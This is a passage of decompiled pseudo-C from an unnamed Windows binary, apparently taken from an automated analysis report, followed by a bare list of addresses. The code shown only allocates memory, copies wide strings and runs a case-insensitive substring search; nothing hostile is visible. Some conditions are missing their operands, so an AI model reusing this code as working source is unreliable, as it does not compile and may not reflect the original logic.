							_t369 =  <=  ? 0x40 : _t368;
							__eflags = _t338 - _t369;
							if(_t338 < _t369) {
								_t225 = (_t369 >> 5 >> 0x1a) + _t369 >> 6;
								_t370 = _t369 & 0x8000003f;
								__eflags = _t370;
								if(_t370 < 0) {
									_t370 = (_t370 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t370;
								}
								__eflags = _t370;
								_t226 = _t225 + (0 | _t370 > 0x00000000);
								_push(_t226 << 7);
								_t424 = _t226 << 6;
								_t373 = E6E791030();
								_t461 = _t461 + 4;
								_t339 = _v52;
								__eflags = _t339;
								if(_t339 == 0) {
									__eflags = 0;
									 *_t373 = 0;
									goto L36;
								} else {
									__eflags = _t373;
									if(_t373 == 0) {
										L34:
										_push(2);
										_push(_t339);
										_v68 = _t373;
										E6E7910B0();
										_t373 = _v68;
										_t461 = _t461 + 8;
										L36:
										_v48 = _t424;
										_v52 = _t373;
										L37:
										 *((short*)(_t373 + _t300 * 2)) = _a8 & 0x0000ffff;
										__eflags = 0;
										_t231 =  &_v52;
										 *((short*)(_v52 + 2 + _t300 * 2)) = 0;
										L38:
										_t425 =  *_t231;
										if(_t425 == 0) {
											L40:
											_t375 = _a4;
											_push(0x80);
											 *_t375 = 0;
											 *((intOrPtr*)(_t375 + 4)) = 0;
											_t301 = E6E791030();
											_t461 = _t461 + 4;
											_t235 =  *_a4;
											if(_t235 == 0) {
												 *_t301 = 0;
												L61:
												_t237 = _a4;
												 *_t237 = _t301;
												_t237[1] = 0x40;
												L62:
												_push(2);
												_push(_v52);
												E6E7910B0();
												_v52 = 0;
												_v48 = 0;
												return _a4;
											}
											if(_t301 == 0) {
												L46:
												_push(2);
												_push(_t235);
												E6E7910B0();
												_t461 = _t461 + 8;
												goto L61;
											}
											_t376 =  *_t235 & 0x0000ffff;
											 *_t301 = _t376;
											if(_t376 == 0) {
												goto L46;
											}
											_t377 = 0;
											while(1) {
												_t377 = _t377 + 1;
												_t341 =  *(_t235 + _t377 * 4 - 2) & 0x0000ffff;
												 *(_t301 + _t377 * 4 - 2) = _t341;
												if(_t341 == 0) {
													goto L46;
												}
												_t342 =  *(_t235 + _t377 * 4) & 0x0000ffff;
												 *(_t301 + _t377 * 4) = _t342;
												if(_t342 != 0) {
													continue;
												}
												goto L46;
											}
											goto L46;
										}
										_t378 =  *_t425 & 0x0000ffff;
										if(_t378 != 0) {
											_t242 =  *_t438;
											__eflags = _t242;
											if(_t242 == 0) {
												L53:
												_t379 = _a4;
												_push(0x80);
												 *_t379 = 0;
												 *((intOrPtr*)(_t379 + 4)) = 0;
												_t301 = E6E791030();
												_t461 = _t461 + 4;
												_t246 =  *_a4;
												__eflags = _t246;
												if(_t246 == 0) {
													__eflags = 0;
													 *_t301 = 0;
													goto L61;
												}
												__eflags = _t301;
												if(_t301 == 0) {
													L59:
													_push(2);
													_push(_t246);
													E6E7910B0();
													_t461 = _t461 + 8;
													goto L61;
												}
												_t380 =  *_t246 & 0x0000ffff;
												 *_t301 = _t380;
												__eflags = _t380;
												if(_t380 == 0) {
													goto L59;
												}
												_t381 = 0;
												__eflags = 0;
												while(1) {
													_t381 = _t381 + 1;
													_t343 =  *(_t246 + _t381 * 4 - 2) & 0x0000ffff;
													 *(_t301 + _t381 * 4 - 2) = _t343;
													__eflags = _t343;
													if(_t343 == 0) {
														goto L59;
													}
													_t344 =  *(_t246 + _t381 * 4) & 0x0000ffff;
													 *(_t301 + _t381 * 4) = _t344;
													__eflags = _t344;
													if(_t344 != 0) {
														continue;
													}
													goto L59;
												}
												goto L59;
											}
											__eflags =  *_t242 & 0x0000ffff;
											if(( *_t242 & 0x0000ffff) == 0) {
												goto L53;
											}
											_v36 = _t425;
											_t65 = _t378 - 0x41; // -65
											__eflags = _t65 - 0x19;
											_t66 = _t378 + 0x20; // 0x20
											_t382 =  <=  ? _t66 : _t378;
											_t347 = 0;
											__eflags = 0;
											_t383 = ( <=  ? _t66 : _t378) & 0x0000ffff;
											_v56 = _t383;
											while(1) {
												_t427 =  *(_t242 + _t347 * 2) & 0x0000ffff;
												_t70 = _t427 - 0x41; // 0x7fffffc0
												__eflags = _t70 - 0x19;
												_t71 = _t427 + 0x20; // 0x80000021
												_t428 =  <=  ? _t71 :  *(_t242 + _t347 * 2) & 0x0000ffff;
												__eflags = ( <=  ? _t71 :  *(_t242 + _t347 * 2) & 0x0000ffff) - _t383;
												if(( <=  ? _t71 :  *(_t242 + _t347 * 2) & 0x0000ffff) == _t383) {
													break;
												}
												_t347 = _t347 + 1;
												__eflags =  *(_t242 + _t347 * 2) & 0x0000ffff;
												if(( *(_t242 + _t347 * 2) & 0x0000ffff) != 0) {
													continue;
												}
												goto L53;
											}
											_t429 = _v36;
											_t348 = _t242 + _t347 * 2;
											__eflags = _t348;
											if(_t348 == 0) {
												goto L53;
											}
											_t306 = _t429 & 0x0000000f;
											asm("pxor xmm0, xmm0");
											_t385 = _t306 & 0x00000001;
											_t444 =  ~_t306 + 0x10 >> 1;
											_v32 = _t242;
											_v36 = _t429;
											while(1) {
												L69:
												_t430 = _t306;
												__eflags = _t306;
												if(_t306 == 0) {
													goto L75;
												}
												_t257 = 0;
												__eflags = _t385;
												if(_t385 != 0) {
													L79:
													_v40 = _t348;
													_t436 = _v36;
													while(1) {
														__eflags =  *(_t436 + _t257 * 2) & 0x0000ffff;
														if(( *(_t436 + _t257 * 2) & 0x0000ffff) == 0) {
															break;
														}
														_t257 = _t257 + 1;
														__eflags = _t257 - 0x7fffffff;
														if(_t257 < 0x7fffffff) {
															continue;
														}
														_v36 = _t436;
														_t350 = _v40;
														L83:
														_t257 = 0x7fffffff;
														L84:
														_v60 = _t257;
														_t431 = 0;
														__eflags = 0;
														_v68 = _t306;
														_v64 = _t444;
														_v44 = _t386;
														while(1) {
															_t307 =  *(_t350 + _t431 * 2) & 0x0000ffff;
															_t446 =  *(_v36 + _t431 * 2) & 0x0000ffff;
															__eflags = _t307 - 0x61 - 0x19;
															_t308 =  <=  ? _t307 - 0x20 : _t307;
															_t259 = ( <=  ? _t307 - 0x20 : _t307) & 0x0000ffff;
															__eflags = _t446 - 0x61 - 0x19;
															_t447 =  <=  ? _t446 - 0x20 : _t446;
															__eflags = _t259 - ( <=  ? _t446 - 0x20 : _t446);
															if(__eflags < 0 || __eflags > 0) {
																break;
															}
															__eflags = _t259;
															if(_t259 == 0) {
																L89:
																_t306 = _v68;
																_t444 = _v64;
																_t385 = _v44;
																_t262 = _v32;
																_t434 = _v36;
																L90:
																__eflags = _t350;
																if(_t350 == 0) {
																	goto L53;
																}
																__eflags = _t306;
																if(_t306 == 0) {
																	L97:
																	_t397 =  ~( ~_t306 + 0x00000007 & 0x00000007) + 0x7fffffff;
																	__eflags = _t397;
																	while(1) {
																		asm("movdqu xmm1, [edi+ebx*2]");
																		asm("pcmpeqw xmm1, xmm0");
																		asm("pmovmskb esi, xmm1");
																		__eflags = _t444;
																		if(_t444 != 0) {
																			break;
																		}
																		_t306 = _t306 + 8;
																		__eflags = _t306 - _t397;
																		if(_t306 < _t397) {
																			continue;
																		}
																		__eflags = _t397 - 0x7fffffff;
																		if(_t397 >= 0x7fffffff) {
																			L103:
																			_t397 = 0x7fffffff;
																			L104:
																			_t451 = _t262 & 0x0000000f;
																			__eflags = _t451;
																			if(_t451 == 0) {
																				L109:
																				_t319 =  ~( ~_t451 + 0x00000007 & 0x00000007) + 0x7fffffff;
																				__eflags = _t319;
																				while(1) {
																					asm("movdqu xmm1, [eax+esi*2]");
																					asm("pcmpeqw xmm1, xmm0");
																					asm("pmovmskb edi, xmm1");
																					__eflags = _t434;
																					if(_t434 != 0) {
																						break;
																					}
																					_t451 = _t451 + 8;
																					__eflags = _t451 - _t319;
																					if(_t451 < _t319) {
																						continue;
																					}
																					__eflags = _t319 - 0x7fffffff;
																					if(_t319 >= 0x7fffffff) {
																						L115:
																						_t319 = 0x7fffffff;
																						L116:
																						_t355 = (_t350 - _t262 >> 1) + _t397;
																						__eflags = _t355;
																						_t356 =  <=  ? 0 : _t355;
																						__eflags = _t319 - _t356;
																						_t357 =  <  ? _t319 : _t356;
																						_t321 = _t319 - _t357;
																						_t435 = _t262 + _t357 * 2;
																						_t263 = _a4;
																						 *_t263 = 0;
																						 *((intOrPtr*)(_t263 + 4)) = 0;
																						__eflags = _t435;
																						if(_t435 == 0) {
																							L151:
																							_push(0x80);
																							_t301 = E6E791030();
																							_t461 = _t461 + 4;
																							_t266 =  *_a4;
																							__eflags = _t266;
																							if(_t266 == 0) {
																								 *_t301 = 0;
																								goto L61;
																							}
																							__eflags = _t301;
																							if(_t301 == 0) {
																								L157:
																								_push(2);
																								_push(_t266);
																								E6E7910B0();
																								_t461 = _t461 + 8;
																								goto L61;
																							}
																							_t400 =  *_t266 & 0x0000ffff;
																							 *_t301 = _t400;
																							__eflags = _t400;
																							if(_t400 == 0) {
																								goto L157;
																							}
																							_t401 = 0;
																							__eflags = 0;
																							while(1) {
																								_t401 = _t401 + 1;
																								_t358 =  *(_t266 + _t401 * 4 - 2) & 0x0000ffff;
																								 *(_t301 + _t401 * 4 - 2) = _t358;
																								__eflags = _t358;
																								if(_t358 == 0) {
																									goto L157;
																								}
																								_t359 =  *(_t266 + _t401 * 4) & 0x0000ffff;
																								 *(_t301 + _t401 * 4) = _t359;
																								__eflags = _t359;
																								if(_t359 != 0) {
																									continue;
																								}
																								goto L157;
																							}
																							goto L157;
																						}
																						_t269 =  *_t435 & 0x0000ffff;
																						__eflags = _t269;
																						if(_t269 == 0) {
																							goto L151;
																						}
																						__eflags = _t321;
																						if(_t321 != 0) {
																							L131:
																							_t160 = _t321 + 1; // 0x80000000
																							_t402 = _t160;
																							__eflags = _t402 - 0x40;
																							_t403 =  <=  ? 0x40 : _t402;
																							__eflags = _t403;
																							if(_t403 > 0) {
																								_t275 = (_t403 >> 5 >> 0x1a) + _t403 >> 6;
																								_t404 = _t403 & 0x8000003f;
																								__eflags = _t404;
																								if(_t404 < 0) {
																									_t404 = (_t404 - 0x00000001 | 0xffffffc0) + 1;
																									__eflags = _t404;
																								}
																								__eflags = _t404;
																								_t276 = _t275 + (0 | _t404 > 0x00000000);
																								_v68 = _t276 << 6;
																								_push(_t276 << 7);
																								_t452 = E6E791030();
																								_t461 = _t461 + 4;
																								_t407 =  *_a4;
																								__eflags = _t407;
																								if(_t407 == 0) {
																									__eflags = 0;
																									 *_t452 = 0;
																									goto L143;
																								} else {
																									__eflags = _t452;
																									if(_t452 == 0) {
																										L141:
																										_push(2);
																										_push(_t407);
																										E6E7910B0();
																										_t461 = _t461 + 8;
																										L143:
																										_t408 = _a4;
																										_t408[1] = _v68;
																										 *_t408 = _t452;
																										L144:
																										__eflags = _t452;
																										if(_t452 == 0) {
																											goto L62;
																										}
																										_t282 = 0;
																										while(1) {
																											_t409 =  *_t435 & 0x0000ffff;
																											_t282 = _t282 + 1;
																											 *_t452 = _t409;
																											__eflags = _t321;
																											if(_t321 == 0) {
																												goto L149;
																											}
																											__eflags = _t282 - _t321;
																											if(_t282 == _t321) {
																												 *(_t452 + 2) = 0;
																												goto L62;
																											}
																											L149:
																											__eflags = _t409;
																											if(_t409 == 0) {
																												goto L62;
																											}
																											_t452 = _t452 + 2;
																											_t435 = _t435 + 2;
																											__eflags = _t435;
																										}
																									}
																									_t285 =  *_t407 & 0x0000ffff;
																									 *_t452 = _t285;
																									__eflags = _t285;
																									if(_t285 == 0) {
																										goto L141;
																									}
																									_t286 = 0;
																									__eflags = 0;
																									while(1) {
																										_t286 = _t286 + 1;
																										_t362 =  *(_t407 + _t286 * 4 - 2) & 0x0000ffff;
																										 *(_t452 + _t286 * 4 - 2) = _t362;
																										__eflags = _t362;
																										if(_t362 == 0) {
																											goto L141;
																										}
																										_t363 =  *(_t407 + _t286 * 4) & 0x0000ffff;
																										 *(_t452 + _t286 * 4) = _t363;
																										__eflags = _t363;
																										if(_t363 != 0) {
																											continue;
																										}
																										goto L141;
																									}
																									goto L141;
																								}
																							}
																							_t452 = 0;
																							goto L144;
																						}
																						_t413 = _t435 & 0x0000000f;
																						__eflags = _t413;
																						if(_t413 == 0) {
																							L124:
																							_t321 =  ~( ~_t413 + 0x00000007 & 0x00000007) + 0x7fffffff;
																							__eflags = _t321;
																							while(1) {
																								asm("movdqu xmm1, [edi+edx*2]");
																								asm("pcmpeqw xmm1, xmm0");
																								asm("pmovmskb eax, xmm1");
																								__eflags = _t269;
																								if(_t269 != 0) {
																									break;
																								}
																								_t413 = _t413 + 8;
																								__eflags = _t413 - _t321;
																								if(_t413 < _t321) {
																									continue;
																								}
																								__eflags = _t321 - 0x7fffffff;
																								if(_t321 >= 0x7fffffff) {
																									L130:
																									_t321 = 0x7fffffff;
																									goto L131;
																								} else {
																									goto L128;
																								}
																								while(1) {
																									L128:
																									__eflags =  *(_t435 + _t321 * 2) & 0x0000ffff;
																									if(( *(_t435 + _t321 * 2) & 0x0000ffff) == 0) {
																										goto L131;
																									}
																									_t321 = _t321 + 1;
																									__eflags = _t321 - 0x7fffffff;
																									if(_t321 < 0x7fffffff) {
																										continue;
																									}
																									goto L130;
																								}
																								goto L131;
																							}
																							asm("bsf ebx, eax");
																							_t321 = (_t321 >> 1) + _t413;
																							goto L131;
																						}
																						_t321 = 0;
																						__eflags = _t413 & 0x00000001;
																						if((_t413 & 0x00000001) != 0) {
																							goto L128;
																						}
																						_t413 =  ~_t413 + 0x10 >> 1;
																						__eflags = _t413;
																						while(1) {
																							_t269 =  *(_t435 + _t321 * 2) & 0x0000ffff;
																							__eflags = _t269;
																							if(_t269 == 0) {
																								goto L131;
																							}
																							_t321 = _t321 + 1;
																							__eflags = _t321 - _t413;
																							if(_t321 < _t413) {
																								continue;
																							}
																							goto L124;
																						}
																						goto L131;
																					} else {
																						goto L113;
																					}
																					while(1) {
																						L113:
																						__eflags =  *(_t262 + _t319 * 2) & 0x0000ffff;
																						if(( *(_t262 + _t319 * 2) & 0x0000ffff) == 0) {
																							goto L116;
																						}
																						_t319 = _t319 + 1;
																						__eflags = _t319 - 0x7fffffff;
																						if(_t319 < 0x7fffffff) {
																							continue;
																						}
																						goto L115;
																					}
																					goto L116;
																				}
																				asm("bsf ebx, edi");
																				_t319 = (_t319 >> 1) + _t451;
																				goto L116;
																			}
																			_t319 = 0;
																			__eflags = _t451 & 0x00000001;
																			if((_t451 & 0x00000001) != 0) {
																				goto L113;
																			}
																			_t451 =  ~_t451 + 0x10 >> 1;
																			__eflags = _t451;
																			while(1) {
																				_t434 =  *(_t262 + _t319 * 2) & 0x0000ffff;
																				__eflags = _t434;
																				if(_t434 == 0) {
																					goto L116;
																				}
																				_t319 = _t319 + 1;
																				__eflags = _t319 - _t451;
																				if(_t319 < _t451) {
																					continue;
																				}
																				goto L109;
																			}
																			goto L116;
																		} else {
																			goto L101;
																		}
																		while(1) {
																			L101:
																			__eflags =  *(_t434 + _t397 * 2) & 0x0000ffff;
																			if(( *(_t434 + _t397 * 2) & 0x0000ffff) == 0) {
																				goto L104;
																			}
																			_t397 = _t397 + 1;
																			__eflags = _t397 - 0x7fffffff;
																			if(_t397 < 0x7fffffff) {
																				continue;
																			}
																			goto L103;
																		}
																		goto L104;
																	}
																	asm("bsf edx, esi");
																	_t397 = (_t397 >> 1) + _t306;
																	goto L104;
																}
																__eflags = _t385;
																_t397 = 0;
																if(_t385 != 0) {
																	goto L101;
																}
																_v32 = _t262;
																_t306 = _t444;
																while(1) {
																	__eflags =  *(_t434 + _t397 * 2) & 0x0000ffff;
																	if(( *(_t434 + _t397 * 2) & 0x0000ffff) == 0) {
																		break;
																	}
																	_t397 = _t397 + 1;
																	__eflags = _t397 - _t444;
																	if(_t397 < _t444) {
																		continue;
																	}
																	_t262 = _v32;
																	goto L97;
																}
																_t262 = _v32;
																goto L104;
															}
															_t431 = _t431 + 1;
															__eflags = _t431 - _v60;
															if(_t431 < _v60) {
																continue;
															}
															goto L89;
														}
														_t310 = _v68;
														_t448 = _v64;
														_t389 = _v44;
														_t433 = _t350 + 2;
														__eflags = _t433;
														if(_t433 == 0) {
															goto L53;
														}
														__eflags =  *(_t350 + 2) & 0x0000ffff;
														if(( *(_t350 + 2) & 0x0000ffff) == 0) {
															goto L53;
														}
														_v68 = _t310;
														_t261 = 0;
														__eflags = 0;
														_v64 = _t448;
														_v44 = _t389;
														_v40 = _t350;
														while(1) {
															_t261 = _t261 + 1;
															_t348 = _v40 + _t261 * 2;
															_t390 =  *_t348 & 0x0000ffff;
															__eflags = ( *(_t433 + _t261 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
															_t391 =  <=  ? _t390 + 0x20 : _t390;
															__eflags = ( <=  ? _t390 + 0x20 : _t390) - _v56;
															if(( <=  ? _t390 + 0x20 : _t390) == _v56) {
																break;
															}
															__eflags =  *(_t433 + _t261 * 2) & 0x0000ffff;
															if(( *(_t433 + _t261 * 2) & 0x0000ffff) != 0) {
																continue;
															}
															goto L53;
														}
														_t306 = _v68;
														_t444 = _v64;
														_t385 = _v44;
														goto L69;
													}
													_v36 = _t436;
													_t350 = _v40;
													L162:
													__eflags = _t257;
													if(__eflags == 0) {
														goto L83;
													}
													if(__eflags > 0) {
														goto L84;
													}
													_t262 = _v32;
													_t434 = _v36;
													goto L90;
												}
												_v40 = _t348;
												_t430 = _t444;
												_v44 = _t385;
												_t364 = _v36;
												while(1) {
													__eflags =  *(_t364 + _t257 * 2) & 0x0000ffff;
													if(( *(_t364 + _t257 * 2) & 0x0000ffff) == 0) {
														break;
													}
													_t257 = _t257 + 1;
													__eflags = _t257 - _t444;
													if(_t257 < _t444) {
														continue;
													}
													_v36 = _t364;
													_t385 = _v44;
													_t348 = _v40;
													goto L75;
												}
												_v36 = _t364;
												_t386 = _v44;
												_t350 = _v40;
												goto L162;
												L75:
												_v40 = _t348;
												_t254 =  ~( ~_t430 + 0x00000007 & 0x00000007) + 0x7fffffff;
												__eflags = _t254;
												_v44 = _t385;
												_t349 = _v36;
												while(1) {
													asm("movdqu xmm1, [ecx+edi*2]");
													asm("pcmpeqw xmm1, xmm0");
													asm("pmovmskb edx, xmm1");
													__eflags = _t385;
													if(_t385 != 0) {
														break;
													}
													_t430 = _t430 + 8;
													__eflags = _t430 - _t254;
													if(_t430 < _t254) {
														continue;
													}
													_v36 = _t349;
													_t386 = _v44;
													_t350 = _v40;
													__eflags = _t254 - 0x7fffffff;
													if(_t254 >= 0x7fffffff) {
														goto L83;
													}
													goto L79;
												}
												asm("bsf eax, eax");
												_v36 = _t349;
												_t257 = (_t385 >> 1) + _t430;
												_t386 = _v44;
												_t350 = _v40;
												goto L162;
											}
										}
										goto L40;
									}
									_t290 =  *_t339 & 0x0000ffff;
									 *_t373 = _t290;
									__eflags = _t290;
									if(_t290 == 0) {
										goto L34;
									}
									_v68 = _t438;
									_t291 = 0;
									__eflags = 0;
									while(1) {
										_t291 = _t291 + 1;
										_t456 =  *(_t339 + _t291 * 4 - 2) & 0x0000ffff;
										 *(_t373 + _t291 * 4 - 2) = _t456;
										__eflags = _t456;
										if(_t456 == 0) {
											break;
										}
										_t457 =  *(_t339 + _t291 * 4) & 0x0000ffff;
										 *(_t373 + _t291 * 4) = _t457;
										__eflags = _t457;
										if(_t457 != 0) {
											continue;
										}
										break;
									}
									_t438 = _v68;
									goto L34;
								}
							}
							_t373 = _v52;
							goto L37;
						}
						_t293 = _t422 & 0x0000000f;
						__eflags = _t293;
						if(_t293 == 0) {
							L16:
							asm("pxor xmm0, xmm0");
							_t335 =  ~( ~_t293 + 0x00000007 & 0x00000007) + 0x7fffffff;
							__eflags = _t335;
							while(1) {
								asm("movdqu xmm1, [edi+eax*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb edx, xmm1");
								__eflags = _t367;
								if(_t367 != 0) {
									break;
								}
								_t293 = _t293 + 8;
								__eflags = _t293 - _t335;
								if(_t293 < _t335) {
									continue;
								}
								__eflags = _t335 - 0x7fffffff;
								if(_t335 >= 0x7fffffff) {
									L22:
									_t338 = 0x40;
									_t300 = 0x7fffffff;
									goto L23;
								} else {
									goto L20;
								}
								while(1) {
									L20:
									__eflags =  *(_t422 + _t335 * 2) & 0x0000ffff;
									if(( *(_t422 + _t335 * 2) & 0x0000ffff) == 0) {
										break;
									}
									_t335 = _t335 + 1;
									__eflags = _t335 - 0x7fffffff;
									if(_t335 < 0x7fffffff) {
										continue;
									}
									goto L22;
								}
								L63:
								__eflags = _t300 - 0xfffffffe;
								if(_t300 != 0xfffffffe) {
									_t338 = 0x40;
								} else {
									 *_t422 = 0;
									_t338 = _v48;
								}
								goto L23;
							}
							asm("bsf ebx, edx");
							_t300 = (_t335 >> 1) + _t293;
							goto L63;
						}
						_t335 = 0;
						__eflags = _t293 & 0x00000001;
						if((_t293 & 0x00000001) != 0) {
							goto L20;
						}
						_t293 =  ~_t293 + 0x10 >> 1;
						__eflags = _t293;
						while(1) {
							_t367 =  *(_t422 + _t335 * 2) & 0x0000ffff;
							__eflags = _t367;
							if(_t367 == 0) {
								goto L63;
							}
							_t335 = _t335 + 1;
							__eflags = _t335 - _t293;
							if(_t335 < _t293) {
								continue;
							}
							goto L16;
						}
						goto L63;
					}
					_t231 =  &_v52;
					goto L38;
				}
				if(_t422 == 0) {
					L6:
					_push(2);
					_push(_t217);
					E6E7910B0();
					_t461 = _t461 + 8;
					goto L8;
				}
				_t367 =  *_t217 & 0x0000ffff;
				 *_t422 = _t367;
				if(_t367 == 0) {
					goto L6;
				}
				while(1) {
					_t367 = 1;
					_t365 = _t217[1] & 0x0000ffff;
					 *(_t422 + 2) = _t365;
					if(_t365 == 0) {
						goto L6;
					}
					_t366 = _t217[2] & 0x0000ffff;
					 *(_t422 + 4) = _t366;
					if(_t366 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x6e79b6fe
0x6e79b702
0x6e79b704
0x6e79b708
0x6e79b712
0x6e79b714
0x6e79b717
0x6e79b71d
0x6e79b757
0x6e79b759
0x6e79b75c
0x6e79b760
0x6e79b768
0x6e79b76e
0x6e79b779
0x6e79b77b
0x6e79bf3a
0x6e79bf3f
0x6e79b7ff
0x6e79b804
0x6e79b804
0x6e79b807
0x6e79b80a
0x6e79b80d
0x6e79b80f
0x6e79b824
0x6e79b827
0x6e79b827
0x6e79b82d
0x6e79b835
0x6e79b835
0x6e79b835
0x6e79b836
0x6e79b840
0x6e79b847
0x6e79b848
0x6e79b850
0x6e79b852
0x6e79b855
0x6e79b859
0x6e79b85b
0x6e79b8a3
0x6e79b8a5
0x00000000
0x6e79b85d
0x6e79b85d
0x6e79b85f
0x6e79b88e
0x6e79b88e
0x6e79b890
0x6e79b891
0x6e79b895
0x6e79b89a
0x6e79b89e
0x6e79b8a8
0x6e79b8a8
0x6e79b8ac
0x6e79b8b0
0x6e79b8b4
0x6e79b8b8
0x6e79b8be
0x6e79b8c2
0x6e79b8c7
0x6e79b8c7
0x6e79b8cb
0x6e79b8d4
0x6e79b8d4
0x6e79b8d9
0x6e79b8de
0x6e79b8e0
0x6e79b8e8
0x6e79b8ea
0x6e79b8f0
0x6e79b8f4
0x6e79b933
0x6e79b9e2
0x6e79b9e2
0x6e79b9e5
0x6e79b9e7
0x6e79b9ee
0x6e79b9ee
0x6e79b9f0
0x6e79b9f4
0x6e79b9fe
0x6e79ba02
0x6e79ba12
0x6e79ba12
0x6e79b8f8
0x6e79b921
0x6e79b921
0x6e79b923
0x6e79b924
0x6e79b929
0x00000000
0x6e79b929
0x6e79b8fa
0x6e79b8fd
0x6e79b902
0x00000000
0x00000000
0x6e79b904
0x6e79b906
0x6e79b906
0x6e79b907
0x6e79b90c
0x6e79b913
0x00000000
0x00000000
0x6e79b915
0x6e79b919
0x6e79b91f
0x00000000
0x00000000
0x00000000
0x6e79b91f
0x00000000
0x6e79b906
0x6e79b8cd
0x6e79b8d2
0x6e79b93b
0x6e79b93d
0x6e79b93f
0x6e79b983
0x6e79b983
0x6e79b988
0x6e79b98d
0x6e79b98f
0x6e79b997
0x6e79b999
0x6e79b99f
0x6e79b9a1
0x6e79b9a3
0x6e79b9dd
0x6e79b9df
0x00000000
0x6e79b9df
0x6e79b9a5
0x6e79b9a7
0x6e79b9d0
0x6e79b9d0
0x6e79b9d2
0x6e79b9d3
0x6e79b9d8
0x00000000
0x6e79b9d8
0x6e79b9a9
0x6e79b9ac
0x6e79b9af
0x6e79b9b1
0x00000000
0x00000000
0x6e79b9b3
0x6e79b9b3
0x6e79b9b5
0x6e79b9b5
0x6e79b9b6
0x6e79b9bb
0x6e79b9c0
0x6e79b9c2
0x00000000
0x00000000
0x6e79b9c4
0x6e79b9c8
0x6e79b9cc
0x6e79b9ce
0x00000000
0x00000000
0x00000000
0x6e79b9ce
0x00000000
0x6e79b9b5
0x6e79b944
0x6e79b946
0x00000000
0x00000000
0x6e79b948
0x6e79b94c
0x6e79b94f
0x6e79b952
0x6e79b955
0x6e79b958
0x6e79b958
0x6e79b95a
0x6e79b95d
0x6e79b961
0x6e79b961
0x6e79b965
0x6e79b968
0x6e79b96b
0x6e79b96e
0x6e79b971
0x6e79b974
0x00000000
0x00000000
0x6e79b97a
0x6e79b97f
0x6e79b981
0x00000000
0x00000000
0x00000000
0x6e79b981
0x6e79ba32
0x6e79ba36
0x6e79ba39
0x6e79ba3b
0x00000000
0x00000000
0x6e79ba43
0x6e79ba46
0x6e79ba50
0x6e79ba56
0x6e79ba58
0x6e79ba5c
0x6e79ba6d
0x6e79ba6d
0x6e79ba6d
0x6e79ba6f
0x6e79ba71
0x00000000
0x00000000
0x6e79ba73
0x6e79ba75
0x6e79ba77
0x6e79baf0
0x6e79baf0
0x6e79baf4
0x6e79baf8
0x6e79bafc
0x6e79bafe
0x00000000
0x00000000
0x6e79bb04
0x6e79bb05
0x6e79bb0a
0x00000000
0x00000000
0x6e79bb0c
0x6e79bb10
0x6e79bb14
0x6e79bb14
0x6e79bb19
0x6e79bb19
0x6e79bb1d
0x6e79bb1d
0x6e79bb1f
0x6e79bb22
0x6e79bb26
0x6e79bb2a
0x6e79bb2a
0x6e79bb35
0x6e79bb39
0x6e79bb3f
0x6e79bb42
0x6e79bb48
0x6e79bb4e
0x6e79bb51
0x6e79bb54
0x00000000
0x00000000
0x6e79bb60
0x6e79bb62
0x6e79bb6b
0x6e79bb6b
0x6e79bb6e
0x6e79bb72
0x6e79bb76
0x6e79bb7a
0x6e79bb7e
0x6e79bb7e
0x6e79bb80
0x00000000
0x00000000
0x6e79bb86
0x6e79bb88
0x6e79bbae
0x6e79bbba
0x6e79bbba
0x6e79bbc0
0x6e79bbc0
0x6e79bbc5
0x6e79bbc9
0x6e79bbcd
0x6e79bbcf
0x00000000
0x00000000
0x6e79bbd5
0x6e79bbd8
0x6e79bbda
0x00000000
0x00000000
0x6e79bbdc
0x6e79bbe2
0x6e79bbf5
0x6e79bbf5
0x6e79bbfa
0x6e79bbfc
0x6e79bbfc
0x6e79bbff
0x6e79bc1f
0x6e79bc2b
0x6e79bc2b
0x6e79bc31
0x6e79bc31
0x6e79bc36
0x6e79bc3a
0x6e79bc3e
0x6e79bc40
0x00000000
0x00000000
0x6e79bc46
0x6e79bc49
0x6e79bc4b
0x00000000
0x00000000
0x6e79bc4d
0x6e79bc53
0x6e79bc66
0x6e79bc66
0x6e79bc6b
0x6e79bc6f
0x6e79bc73
0x6e79bc75
0x6e79bc78
0x6e79bc7a
0x6e79bc7d
0x6e79bc7f
0x6e79bc82
0x6e79bc85
0x6e79bc87
0x6e79bc8a
0x6e79bc8c
0x6e79bde2
0x6e79bde2
0x6e79bdec
0x6e79bdee
0x6e79bdf4
0x6e79bdf6
0x6e79bdf8
0x6e79be37
0x00000000
0x6e79be37
0x6e79bdfa
0x6e79bdfc
0x6e79be25
0x6e79be25
0x6e79be27
0x6e79be28
0x6e79be2d
0x00000000
0x6e79be2d
0x6e79bdfe
0x6e79be01
0x6e79be04
0x6e79be06
0x00000000
0x00000000
0x6e79be08
0x6e79be08
0x6e79be0a
0x6e79be0a
0x6e79be0b
0x6e79be10
0x6e79be15
0x6e79be17
0x00000000
0x00000000
0x6e79be19
0x6e79be1d
0x6e79be21
0x6e79be23
0x00000000
0x00000000
0x00000000
0x6e79be23
0x00000000
0x6e79be0a
0x6e79bc92
0x6e79bc95
0x6e79bc97
0x00000000
0x00000000
0x6e79bc9d
0x6e79bc9f
0x6e79bd0f
0x6e79bd14
0x6e79bd14
0x6e79bd17
0x6e79bd1a
0x6e79bd1d
0x6e79bd1f
0x6e79bd32
0x6e79bd35
0x6e79bd35
0x6e79bd3b
0x6e79bd43
0x6e79bd43
0x6e79bd43
0x6e79bd44
0x6e79bd4e
0x6e79bd58
0x6e79bd5b
0x6e79bd61
0x6e79bd63
0x6e79bd69
0x6e79bd6b
0x6e79bd6d
0x6e79bda7
0x6e79bda9
0x00000000
0x6e79bd6f
0x6e79bd6f
0x6e79bd71
0x6e79bd9a
0x6e79bd9a
0x6e79bd9c
0x6e79bd9d
0x6e79bda2
0x6e79bdac
0x6e79bdac
0x6e79bdb2
0x6e79bdb5
0x6e79bdb7
0x6e79bdb7
0x6e79bdb9
0x00000000
0x00000000
0x6e79bdbf
0x6e79bdc9
0x6e79bdc9
0x6e79bdcc
0x6e79bdcd
0x6e79bdd0
0x6e79bdd2
0x00000000
0x00000000
0x6e79bdd4
0x6e79bdd6
0x6e79be4a
0x00000000
0x6e79be4a
0x6e79bdd8
0x6e79bdd8
0x6e79bdda
0x00000000
0x00000000
0x6e79bdc3
0x6e79bdc6
0x6e79bdc6
0x6e79bdc6
0x6e79bdc9
0x6e79bd73
0x6e79bd76
0x6e79bd79
0x6e79bd7b
0x00000000
0x00000000
0x6e79bd7d
0x6e79bd7d
